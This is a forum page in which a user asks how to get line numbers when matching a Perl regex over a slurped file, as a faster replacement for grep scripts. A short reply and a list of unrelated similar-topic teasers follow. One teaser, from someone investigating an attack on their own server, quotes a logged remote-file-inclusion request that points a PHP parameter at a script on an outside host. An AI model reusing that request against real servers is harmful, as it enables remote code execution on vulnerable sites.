perl vs Unix grep

Al Belden

Hi all,
I've been working on a problem that I thought might be of interest: I'm
trying to replace some korn shell scripts that search source code files with
perl scripts to gain certain features such as:

More powerful regular expressions available in perl
Ability to print out lines before and after matches (gnu grep supports this
but is not availble on our Digital Unix and AIX platforms)
Make searches case insensitive by default (yes, I know this can be done with
grep but the shell scripts that use
grep don't do this)

We're talking about approx. 5000 files spread over 15 directories. To date
it has proven quite difficult (for me) to match the performance of the Korn
shell scripts using perl scripts and still obtain the line number and
context information needed. The crux of the problem is that I have seen the
best performance from perl when I match with the /g option on a string that
represents the current slurped file:

local $/;
my $curStr = <FH>;
while ($curStr =~ /$compiledRegex/g)
{
# write matches to file for eventual paging
}

This works well except that when each match is found I need the line number
the match has been found in. As far as I can tell from reading and research
there is no variable that holds this information as I am not reading from
the file at this point. I can get the information in other ways such as:

1. Reading each file a line at a time, testing for a match and keeping a
line counter or using $NR.
2. Reading the file into an array and processing a line at a time
3. Creating index files for the source files that store line offsets and
using them with the slurp method in the
paragraph above
4. Creating an in-memory index for each file that contains a match and using
it for subsequent matches in that file

1, 2 and 4 above suffer performance degradation relative to unix grep. #3
provides good performance and is the method I am currently using but it
requires creating and maintaining index files. I was wondering if I could
tie a scalar to a file and use the slurping loop above. Then perhaps $NR and
$. would contain the current line number as the file would be read as the
loop is traversed. Any other ideas would be welcome

Al

Jul 19 '05 #1

Subscribe Reply

17727

Giridhar Nandigam

Hello Al Baden,

I have had similar problem with getting the index numder of the
element match when we search for elements in an array. It was
fruitless. I used Hash map, but that was a burden on the system. In
another possiable implementation i have done with use of a separate
variable indexCount on array and reintialized evry time.

That's it.
Perl is langauge to make things work at any cost. All the best.
Thanks.
Giridhar Nandigam
"Al Belden" <ab*****@comcas t.net> wrote in message news:<Bv******* *************@c omcast.com>...

Hi all,
I've been working on a problem that I thought might be of interest: I'm
trying to replace some korn shell scripts that search source code files with
perl scripts to gain certain features such as:

More powerful regular expressions available in perl
Ability to print out lines before and after matches (gnu grep supports this
but is not availble on our Digital Unix and AIX platforms)
Make searches case insensitive by default (yes, I know this can be done with
grep but the shell scripts that use
grep don't do this)

We're talking about approx. 5000 files spread over 15 directories. To date
it has proven quite difficult (for me) to match the performance of the Korn
shell scripts using perl scripts and still obtain the line number and
context information needed. The crux of the problem is that I have seen the
best performance from perl when I match with the /g option on a string that
represents the current slurped file:

local $/;
my $curStr = <FH>;
while ($curStr =~ /$compiledRegex/g)
{
# write matches to file for eventual paging
}

This works well except that when each match is found I need the line number
the match has been found in. As far as I can tell from reading and research
there is no variable that holds this information as I am not reading from
the file at this point. I can get the information in other ways such as:

1. Reading each file a line at a time, testing for a match and keeping a
line counter or using $NR.
2. Reading the file into an array and processing a line at a time
3. Creating index files for the source files that store line offsets and
using them with the slurp method in the
paragraph above
4. Creating an in-memory index for each file that contains a match and using
it for subsequent matches in that file

1, 2 and 4 above suffer performance degradation relative to unix grep. #3
provides good performance and is the method I am currently using but it
requires creating and maintaining index files. I was wondering if I could
tie a scalar to a file and use the slurping loop above. Then perhaps $NR and
$. would contain the current line number as the file would be read as the
loop is traversed. Any other ideas would be welcome

Al

Jul 19 '05 #2

Similar topics

4831

Python versus Perl ?

by: surfunbear | last post by:

I've read some posts on Perl versus Python and studied a bit of my Python book. I'm a software engineer, familiar with C++ objected oriented development, but have been using Perl because it is great for pattern matching, text processing, and automated testing. Our company is really fixated on risk managnemt and the only way I can do enough testing without working overtime (which some people have ended up doing) is by automating my...

Python

9756

compiling perl 5.8.7 on Solaris 8

by: Kirt Loki Dankmyer | last post by:

So, I download the latest "stable" tar for perl (5.8.7) and try to compile it on the Solaris 8 (SPARC) box that I administrate. I try all sorts of different switches, but I can't get it to compile. I need it to be compiled with threads. Anyone have any wisdom on how best to do this? Here's a transcript of my latest attempt. It's long; you might want to skip to the bottom, where I try "make" and the fatal errors start happening.

Perl

10647

PHP/Perl/Unix Virus: delete config.php files asap

by: Ignoramus6539 | last post by:

There were some strange requests to my server asking for config.php file (which I do not have in the requested location). I did some investigation. Seems to be a virus written in perl, exploiting a vulnerability in php code. The requests are like this 216.120.231.252 - - "GET /algebra/about/history/config.php?returnpath=http://domates.1gig.biz/spread.txt? HTTP/1.1" 404 561 "-" "libwww-perl/5.805"

PHP

4884

Can I beat perl at grep-like processing speed?

by: js | last post by:

Just my curiosity. Can python beats perl at speed of grep-like processing? $ wget http://www.gutenberg.org/files/7999/7999-h.zip $ unzip 7999-h.zip $ cd 7999-h $ cat *.htm bigfile $ du -h bigfile du -h bigfile

Python

3576

pure perl versus grep -v in unix

by: gyandwivedi | last post by:

what should I use in perl /in place of grep -v in unix.

Perl

4692

unix grep to perl

by: soniamadtha | last post by:

hello everyone, i have the following values : 98000345 and i would like to search this value in all of the sql files in the directory /temp/*sql normally on unix its grep( ' 98000345 ' ,/temp/*sql) however in perl the grep is used somehow in a different way : grep(EXPR,ARRAY/LIST) could anyone suggest how do i implement...grep( ' 98000345 ' ,/temp/*sql) in perl ?

Perl

2930

Perl grep and regular expression Performance : clarification

by: ravir | last post by:

Hi, I am new to this group. I am working in Perl and shellscripts. I have a clarification regarding perl grep and pattern matching. I am writing a perl script to automate the process of code review upto some level so that the reviewer and developer's time can be reduced during the code review. In my script, I am using pattern matching and grep in many places. So, my clarification is : Is it fine to make use of grep to find a pattern in a...

Perl

5713

To grep a file within a time range using PERL

by: hassan470 | last post by:

I work in an investment bank. We have a huge log file which contains FIX messages. I have a problem to grep FIX messages within a time rage (i.e. between 9:30 am to 11 pm, those were sent by CITIBANK for ticker symbol MSFT). I tried different ways but it did not work. Could anyone please help me? Here is one of the codes in perl: #!/usr/bin/perl –w $myfile = “/tmp/fixlog.txt”; open(FH, $myfile) || die “Can not open”; while<FH>{...

Perl

6989

apache error when interfacing html with perl

by: happyse27 | last post by:

Hi All, I got this apache errors(see section A1 and A2 below) when I used a html(see section b below) to activate acctman.pl(see section c below). Section D below is part of the configuration of section c. Not sure where went wrong as the web page displayed internal server error. Also, what is the error 543? and error 2114. Where to find the list of errors in websites as it is not the standard apache error. I could not find...

Perl

9879

Changing the language in Windows 10

by: Hystou | last post by:

Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can effortlessly switch the default language on Windows 10 without reinstalling. I'll walk you through it. First, let's disable language synchronization. With a Microsoft account, language settings sync across devices. To prevent any complications,...

Windows Server

11348

Problem With Comparison Operator <=> in G++

by: Oralloy | last post by:

Hello folks, I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>". The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed. This is as boiled down as I can make it. Here is my compilation command: g++-12 -std=c++20 -Wnarrowing bit_field.cpp Here is the code in...

C / C++

10921

Maximizing Business Potential: The Nexus of Website Design and Digital Marketing

by: jinu1996 | last post by:

In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven tapestry of website design and digital marketing. It's not merely about having a website; it's about crafting an immersive digital experience that captivates audiences and drives business growth. The Art of Business Website Design Your website is...

Online Marketing

11052

The easy way to turn off automatic updates for Windows 10/11

by: Hystou | last post by:

Overview: Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows Update option using the Control Panel or Settings app; it automatically checks for updates and installs any it finds, whether you like it or not. For most users, this new feature is actually very convenient. If you want to control the update process,...

Windows Server

9727

AI Job Threat for Devs

by: agi2029 | last post by:

Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing, and deployment—without human intervention. Imagine an AI that can take a project description, break it down, write the code, debug it, and then launch it, all on its own.... Now, this would greatly impact the work of software developers. The idea...

Career Advice

7249

Couldn’t get equations in html when convert word .docx file to html file in C#.

by: conductexam | last post by:

I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and then checking html paragraph one by one. At the time of converting from word file to html my equations which are in the word document file was convert into image. Globals.ThisAddIn.Application.ActiveDocument.Select();...

C# / C Sharp

5938

Trying to create a lan-to-lan vpn between two differents networks

by: TSSRALBI | last post by:

Hello I'm a network technician in training and I need your help. I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs. The last exercise I practiced was to create a LAN-to-LAN VPN between two Pfsense firewalls, by using IPSEC protocols. I succeeded, with both firewalls in the same network. But I'm wondering if it's possible to do the same thing, with 2 Pfsense firewalls...

Networking - Hardware / Configuration

4776

transfer the data from one system to another through ip address

by: 6302768590 | last post by:

Hai team i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated we have to send another system

C# / C Sharp

4336

How to add payments to a PHP MySQL app.

by: muto222 | last post by:

How can i add a mobile payment intergratation into php mysql website.

PHP